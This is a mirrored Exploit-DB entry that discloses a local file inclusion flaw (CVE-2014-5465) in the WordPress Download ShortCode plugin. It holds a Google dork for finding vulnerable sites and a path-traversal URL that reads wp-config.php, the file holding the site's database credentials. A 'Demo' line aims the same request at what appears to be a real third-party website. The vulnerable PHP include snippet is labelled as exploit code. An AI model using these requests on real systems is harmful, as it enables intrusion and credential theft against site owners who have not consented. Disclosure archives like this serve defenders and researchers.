bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/34436.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

40 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

#################################################################################################
#
# Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity : High+/Critical
# Reporter(s) : Mehdi Karout & Christian Galeone
# Google Dork : inurl:wp/wp-content/force-download.php
# Plugin Version : 0.2.3
# Plugin Name : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home : http://werdswords.com/
# Date : 25/08/2014
# Tested in : Win7 - Kali Linux
# CVE : CVE-2014-5465
#
##################################################################################################
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
#
# $file = $_GET['file'];
# if(isset($file))
# {
# include("pages/$file");
# }
# else
# {
# include("index.php");
# }
#
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
#
##################################################################################################
Reference in a new issue View git blame Copy permalink